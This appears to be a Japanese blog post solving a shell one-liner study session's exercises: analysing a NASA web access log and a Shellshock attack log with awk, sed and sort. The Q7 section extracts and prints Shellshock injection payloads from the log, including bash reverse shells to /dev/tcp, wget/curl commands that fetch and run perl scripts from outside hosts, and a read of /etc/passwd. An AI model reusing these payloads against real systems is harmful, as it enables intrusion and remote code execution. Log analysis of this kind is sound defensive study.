■「第16回春だからログ解析するぞシェル芸勉強会」を解いてみた。
【問題と解答例】第16回春だからログ解析するぞシェル芸勉強会
http://blog.ueda.asia/?p=5644
■準備0
ログをとってきましょう。
■ここでログとは事前に用意されたアクセスログのことです。
自身の端末のログを取っても仕方がないので、普通に。
$ wget http://blog.ueda.asia/misc/access_log.nasa.gz; \
wget http://blog.ueda.asia/wp-content/uploads/2015/04/access.log_.shellshock.gz
$ du -k *.gz
4 access.log_.shellshock.gz
36476 access_log.nasa.gz
■準備1
access.log.shellshock.gzとaccess_log.nasa.gzについて、
日付と時刻を次のように正規化しておきましょう。
■月名の変換だけ気にすれば良い。
$ zcat access_log.nasa.gz | awk '{print $4}' | \
awk -F/ '{print $2}' | sort -u
Aug
Jul
$ zcat access.log_.shellshock.gz | awk '{print $4}' | \
awk -F/ '{print $2}' | sort -u
Dec
Nov
Oct
Sep
$ zcat access_log.nasa.gz | \
awk '{print $4,$0}' | \
sed -e 's%^\[\(..\)/\(...\)/\(....\):\(..\):\(..\):\(..\)%\3\2\1 \4\5\6%' \
-e 's/Jul/07/' \
-e 's/Aug/08/' > nasa.access.log
$ zcat access.log_.shellshock.gz | \
awk '{print $4,$0}' | \
sed -e 's%^\[\(..\)/\(...\)/\(....\):\(..\):\(..\):\(..\)%\3\2\1 \4\5\6%' \
-e 's/Oct/10/' \
-e 's/Nov/11/' \
-e 's/Dec/12/' > shellshock.access.log
■準備2
NASAのログを各日付のファイルに分けておきましょう。
ログはQ1で作ったものを使います。
1,2行目の8桁日付、6桁時刻は残っていても構いません。
■日付ごとに分けるだけ。
$ awk '{print $0 > "nasa."$1}' nasa.access.log
$ ls nasa.[0-9]* | column
nasa.19950701 nasa.19950713 nasa.19950725 nasa.19950810 nasa.19950822
nasa.19950702 nasa.19950714 nasa.19950726 nasa.19950811 nasa.19950823
nasa.19950703 nasa.19950715 nasa.19950727 nasa.19950812 nasa.19950824
nasa.19950704 nasa.19950716 nasa.19950728 nasa.19950813 nasa.19950825
nasa.19950705 nasa.19950717 nasa.19950801 nasa.19950814 nasa.19950826
nasa.19950706 nasa.19950718 nasa.19950803 nasa.19950815 nasa.19950827
nasa.19950707 nasa.19950719 nasa.19950804 nasa.19950816 nasa.19950828
nasa.19950708 nasa.19950720 nasa.19950805 nasa.19950817 nasa.19950829
nasa.19950709 nasa.19950721 nasa.19950806 nasa.19950818 nasa.19950830
nasa.19950710 nasa.19950722 nasa.19950807 nasa.19950819 nasa.19950831
nasa.19950711 nasa.19950723 nasa.19950808 nasa.19950820
nasa.19950712 nasa.19950724 nasa.19950809 nasa.19950821
■Q1
NASAのログについて、ステータスコードを抽出して、
どのコードがいくつあるか数えてみましょう。
■よくあるステータスコードの集計
$ awk '{print $(NF-1)}' nasa.access.log | sort | uniq -c
3100522 200
73070 302
266773 304
15 400
225 403
20901 404
65 500
41 501
$ awk '{print $(NF-1)}' nasa.access.log | awk '{a[$1]+=1};END{for (n in a){print n,a[n]}}' | sort -nr -k2
200 3100522
304 266773
302 73070
404 20901
403 225
500 65
501 41
400 15
■Q2
NASAのログについて、ファイルを開かずに、ログの多い日を探しだしてみましょう。
■ログの多い日
「サイズを見たら」というのはログサイズの大きい日な気がします。
リクエストクエリーのサイズによっては若干変わる可能性がありますので、
行の方がベターかと。
$ wc -l nasa.[0-9]* | sort -k 1 -nr | head -4
3461612 合計
134203 nasa.19950713
100960 nasa.19950706
94575 nasa.19950705
$ du -k nasa.[0-9]* | sort -k 1 -nr | head -3
16172 nasa.19950713
12292 nasa.19950706
11504 nasa.19950705
■Q3
NASAのログについて、(Q3-1)ログの件数が一番多い曜日はどれでしょうか。
(Q3-2)ログの件数が一番多い時間帯
(時間帯というのは0時台、1時台、・・・、23時台のこと)はどれでしょうか。
Q3-2については高速な方法を考えてみてください。
■Q3-1
$ awk '{print $1}' nasa.access.log | \
date -f - "+%A" | sort | uniq -c | sort -k1 -nr
667737 木曜日
574547 水曜日
556590 火曜日
529960 月曜日
497456 金曜日
318046 土曜日
317276 日曜日
■Q3-2
$ awk '{print substr($2,1,2)}' nasa.access.log | \
sort | uniq -c | sort -k1 -nr
230665 15
227228 12
225350 13
223873 14
217564 16
211064 11
193816 10
178664 09
178443 17
149193 08
146091 18
131432 22
131091 19
129907 21
129753 20
123932 23
110312 00
101403 07
91597 01
77805 02
67393 03
66540 06
59506 05
58990 04
■sortをしないと時短出来るの発想は同じです。
後substrでは無いバージョンです。。。
$ awk '{print $2}' nasa.access.log | cut -c -2 | uniq -c | \
awk '{a[$2]+=$1};END{for (n in a){print n,a[n]}}'
00 110312
01 91597
02 77805
10 193816
03 67393
11 211064
04 58990
12 227228
05 59506
20 129753
13 225350
06 66540
21 129907
14 223873
07 101403
22 131432
15 230665
08 149193
23 123932
16 217564
09 178664
17 178443
18 146091
19 131091
■Q4
ShellShockログ内にあるIPアドレス(IPv4)がすべて192.168.から始まることを確認して下さい。
IPアドレスはレコードの先頭だけでなく、インジェクションするコードの中にもあるのでご注意ねがいます。
$ zcat access.log_.shellshock.gz | \
sed -e 's/\([0-9]*.[0-9]*\).[0-9]*.[0-9]*/\n\1\n/' | grep ^192.168\$ | uniq -c
109 192.168
■Q5
ShellShockログについて、レスポンスのデータ送信量が大きいものを、
IPアドレスと共に上から10件を挙げてみましょう。
$ zcat access.log_.shellshock.gz | \
sed -e 's%^\([0-9]*.[0-9]*.[0-9]*.[0-9]*\).*HTTP/1.1\" [0-9]* \([0-9]*\) .*"%\1 \2%' | \
sort -k2 -nr | head -10
192.168.64.196 234
192.168.246.56 234
192.168.246.56 234
192.168.193.42 234
192.168.193.42 234
192.168.193.42 234
192.168.193.42 234
192.168.193.42 233
192.168.193.42 233
192.168.193.42 230
■各IPごとの総データ量は以下。
$ zcat access.log_.shellshock.gz | \
sed -e 's%^\([0-9]*.[0-9]*.[0-9]*.[0-9]*\).*HTTP/1.1\" [0-9]* \([0-9]*\) .*"%\1 \2%' | \
awk '{a[$1]+=$2};END{for (n in a){print n,a[n]}}' | sort -k2 -nr
192.168.193.42 13924
192.168.58.180 2468
192.168.218.214 1346
192.168.246.56 468
192.168.64.196 234
192.168.225.64 227
192.168.87.145 208
192.168.177.253 208
192.168.126.87 208
192.168.113.11 208
192.168.98.218 0
192.168.3.135 0
192.168.238.52 0
192.168.192.217 0
192.168.151.207 0
192.168.119.115 0
192.168.0.90 0
■Q6
NASAのログについて、7月8月のうち、ゼロ件の日を列挙してみてください。
$ for n in `seq -w 0701 0731` `seq -w 0801 0831`;do \
ls nasa.1995$n 2>/dev/null | grep $n >/dev/null 2>&1 || echo "1995$n"; \
done
19950729
19950730
19950731
19950802
■Q7
ShellShockのログから、(Q7-1)インジェクションが試みられたコード(「() { :;};」から後ろ)を抽出してみて傾向を話あってみましょう。
(Q7-2)出来る人はエスケープも掃除してコードを復元してみましょう。
(Q7-3)更にできる人は最後の行のコードを実行してみてください。
このログはIPアドレスを変換しているので安全ですが、普通のログでやると死にますのでご注意を。
■Q7-1
$ zcat access.log_.shellshock.gz | grep ":.*;};" | sed -e 's%^.*:;};\|^.*()\|{ ignored;};%%g' | sort | uniq -c | sed 's/ -O/\n\t&/'
1 /bin/bash -c \"cd /tmp;wget 192.168.8.189/use;curl
-O 192.168.8.189/use ; perl /tmp/use;rm -rf /tmp/use\""
1 /bin/bash -c \"cd /tmp;wget http://192.168.30.34/lex ; curl
-O http://192.168.30.34/lex ; perl lex ;rm -rf lex\""
1 /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
1 /bin/bash -c \"wget http://192.168.105.197/bash-count.txt\""
16 /bin/bash -i >& /dev/tcp/192.168.0.18/8888 0>&1"
1 /bin/bash -i >& /dev/tcp/192.168.10.1/8888 0>&1"
1 /usr/bin/wget http://192.168.63.155/res.html
-O /dev/null; /usr/bin/curl http://192.168.63.155/res.html"
6 echo Content-Type: text/plain ; echo \"TEST: TEST\""
1 echo Content-type:text/plain;echo;/bin/cat /etc/passwd"
1 echo Content-type:text/plain;echo;echo vulnerable"
1 /usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget -q http://192.168.63.71/android.txt
-O /tmp/android.txt;perl /tmp/android.txt;rm -rf /tmp/android*\");'"
62 /usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.168.144.163/guide/lx.pl
-O /tmp/lx.pl;curl -O /tmp/lx.pl http://192.168.144.163/guide/lx.pl;perl /tmp/lx.pl;rm -rf /tmp/lx.pl*\");'"
■Q7-2
$ zcat access.log_.shellshock.gz | grep ":.*;};" | sed -e 's%^.*:;};\|^.*()\|{ ignored;};%%g' | sort | uniq -c | \
cut -c 9- | tr -d '\\' | sed -e 's/rnrn/\n\t\t/g' -e 's/ -O/\n\t&/' | sed s/[\'\"]\"/\'/g
/bin/bash -c "cd /tmp;wget 192.168.8.189/use;curl
-O 192.168.8.189/use ; perl /tmp/use;rm -rf /tmp/use'
/bin/bash -c "cd /tmp;wget http://192.168.30.34/lex ; curl
-O http://192.168.30.34/lex ; perl lex ;rm -rf lex'
/bin/bash -c "echo testing9123123"; /bin/uname -a"
/bin/bash -c "wget http://192.168.105.197/bash-count.txt'
/bin/bash -i >& /dev/tcp/192.168.0.18/8888 0>&1"
/bin/bash -i >& /dev/tcp/192.168.10.1/8888 0>&1"
/usr/bin/wget http://192.168.63.155/res.html
-O /dev/null; /usr/bin/curl http://192.168.63.155/res.html"
echo Content-Type: text/plain ; echo "TEST: TEST'
echo Content-type:text/plain;echo;/bin/cat /etc/passwd"
echo Content-type:text/plain;echo;echo vulnerable"
/usr/bin/perl -e 'print "Content-Type: text/plain
XSUCCESS!";system("wget -q http://192.168.63.71/android.txt
-O /tmp/android.txt;perl /tmp/android.txt;rm -rf /tmp/android*");'
/usr/bin/perl -e 'print "Content-Type: text/plain
XSUCCESS!";system("wget http://192.168.144.163/guide/lx.pl
-O /tmp/lx.pl;curl -O /tmp/lx.pl http://192.168.144.163/guide/lx.pl;perl /tmp/lx.pl;rm -rf /tmp/lx.pl*");'
■Q7-3はやりません。
$ zcat access.log_.shellshock.gz | grep ":.*;};" | tail -1 | \
sed -e 's%^.*:;};\|^.*()\|{ ignored;};%%g' | sort | uniq -c | \
cut -c 9- | tr -d '\\' | sed -e 's/rnrn/\n\t\t/g' -e 's/ -O/\n\t&/' | sed s/[\'\"]\"/\'/g
/usr/bin/perl -e 'print "Content-Type: text/plain
XSUCCESS!";system("wget -q http://192.168.63.71/android.txt
-O /tmp/android.txt;perl /tmp/android.txt;rm -rf /tmp/android*");'
